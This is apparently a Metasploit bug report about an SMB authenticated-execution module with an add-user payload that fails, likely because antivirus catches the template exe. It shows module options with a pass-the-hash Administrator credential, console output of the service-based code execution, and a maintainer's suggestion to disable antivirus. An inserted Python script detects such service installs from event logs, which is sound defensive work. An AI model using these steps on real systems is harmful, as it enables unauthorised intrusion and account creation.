Bug #2474
Microsoft Windows Authenticated User Code Execution with Windows Add User Payload
| Status: | Closed | Start date: | 09/01/2010 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | Joshua J. Drake | % Done: | 0% |
| Category: | payloads | | |
| Target version: | Metasploit 3.5.0 | | |
| Resolution: | invalid | Release Note: | |
Description
Hi,
I was trying the above exploit using an NTLM hash to authenticate and then deploying the windows/adduser payload.
A connection (445) was established between the attacking machine and the target machine.
However, the account was not created on the target machine. Is this exploit limited in the kinds of payload we can deploy?
Note: I have physical access to both machines, and on the targeted machine the account was not created, although a 445 session was established between the attacking and target machines.
```
   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      10.10.10.10                                                        yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SMBDomain  WORKGROUP                                                          no        The Windows domain to use for authentication
   SMBPass    00000000000000000000000000000000:E3D386D6673369E87139D020D653218E  no        The password for the specified username
   SMBUser    Administrator                                                      no        The username to authenticate as

Payload options (windows/adduser):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   PASS      test123          yes       The password for this user
   USER      test123          yes       The username to create

[*] Connecting to the server...
[*] Authenticating as user 'ADministrator'...
[*] Uploading payload...
[*] Created \DkysLinS.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \DkysLinS.exe...
[*] Exploit completed, but no session was created.
```
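From the defender's side, the sequence in the output above (a randomly named exe written to the share, a service with a generated name created over svcctl, started, then removed) leaves a trace on the target: the Service Control Manager logs every installed service as System event ID 7045 with its service name, display name and binary path. The following is an added example, not part of this bug report and not Metasploit code, that scores such records with a simple heuristic: a binary dropped directly into the Windows root (or the ADMIN$ share root that maps to it) plus generated-looking names. The sample records, the `%SYSTEMROOT%` image path, the field names and the scoring thresholds are constructed assumptions for the example; only the service, display and file names in the first record come from the report.

```python
import re
from typing import Iterable

# Constructed sample records shaped like Windows System-log Event ID 7045
# ("A new service was installed in the system", source Service Control Manager).
# Only the service, display and binary names in the first record are taken from
# the report above; every other value here is invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "hjTkQCQp",
     "DisplayName": "MrsMgvquMqVIwuWWTZLIAlXkQPCB",
     "ImagePath": r"%SYSTEMROOT%\DkysLinS.exe",          # assumed image path layout
     "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "DisplayName": "Print Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "PandaAgent",       # constructed, not a real product name
     "DisplayName": "Panda Agent Service",
     "ImagePath": r"C:\Program Files\Panda\agent.exe",
     "StartType": "auto start"},
    {"EventID": 7036, "ServiceName": "Spooler",          # a state change, not an install
     "Message": "The Print Spooler service entered the running state."},
]

# An executable sitting directly in the Windows root (or the ADMIN$ share root),
# with no subdirectory: the drop location seen in the report above.
ROOT_EXE = re.compile(
    r"^(?:%systemroot%|%windir%|[a-z]:\\windows|\\\\[^\\]+\\admin\$)\\[^\\]+\.exe$",
    re.IGNORECASE,
)
VOWELS = set("aeiouAEIOU")


def case_transitions(name: str) -> int:
    """Count positions where letter case flips, e.g. 'DkysLinS' -> 4."""
    letters = [c for c in name if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def looks_random(name: str) -> bool:
    """Heuristic for generated names: all letters, frequent case flips, few vowels.
    Ordinary CamelCase names such as 'PandaAgent' keep a normal vowel ratio and pass."""
    if len(name) < 6 or not name.isalpha():
        return False
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    return case_transitions(name) >= 3 and vowel_ratio < 0.25


def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one record; anything other than a 7045 install event scores 0."""
    if event.get("EventID") != 7045:
        return 0, []
    score, reasons = 0, []
    if ROOT_EXE.match(event.get("ImagePath", "")):
        score += 2
        reasons.append("binary installed directly in Windows root / ADMIN$")
    if looks_random(event.get("ServiceName", "")):
        score += 1
        reasons.append("service name looks generated")
    if looks_random(event.get("DisplayName", "")):
        score += 1
        reasons.append("display name looks generated")
    return score, reasons


def suspicious_services(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Return the install events scoring at or above threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"ServiceName": ev["ServiceName"], "ImagePath": ev["ImagePath"],
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_services(SAMPLE_EVENTS):
        print(hit)
```

The default threshold of 3 requires the structural signal (binary in the Windows root) together with at least one generated-looking name, so a legitimately installed service with an odd abbreviation in System32 is not reported; lowering the threshold to 2 makes the drop location alone sufficient, which is the stronger of the two signals in practice.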
History
Updated by john grisham over 1 year ago
Revision r10155
Updated by Joshua J. Drake over 1 year ago
- Category set to payloads
- Status changed from New to Assigned
- Assignee set to Joshua J. Drake
- Target version set to Metasploit 3.5.0
John, is the targeted machine running anti-virus?
Updated by john grisham over 1 year ago
Yes it is, Panda AV.
Updated by Joshua J. Drake over 1 year ago
You should check your AV logs if possible. Perhaps trying with the AV uninstalled or disabled might yield better results.
Updated by Joshua J. Drake over 1 year ago
To clarify, it is a known issue that the service template exe (and various other template exes) are detected by various antivirus products. I think this may be what you're running into.
Updated by john grisham over 1 year ago
But it's strange: when I use ms0867 as an exploit with the windows/adduser payload in the same environment, it works. Is this usual?
Updated by Joshua J. Drake over 1 year ago
Yes. Regular exploits for memory corruption issues do not use the EXE templates, and thus are not affected by the AV signatures that are catching them.
Updated by Joshua J. Drake over 1 year ago
- Status changed from Assigned to Closed
- Resolution set to invalid
I'm closing this assuming that AV was your issue.
Updated by john grisham over 1 year ago
I will check and get back to you.
Thanks!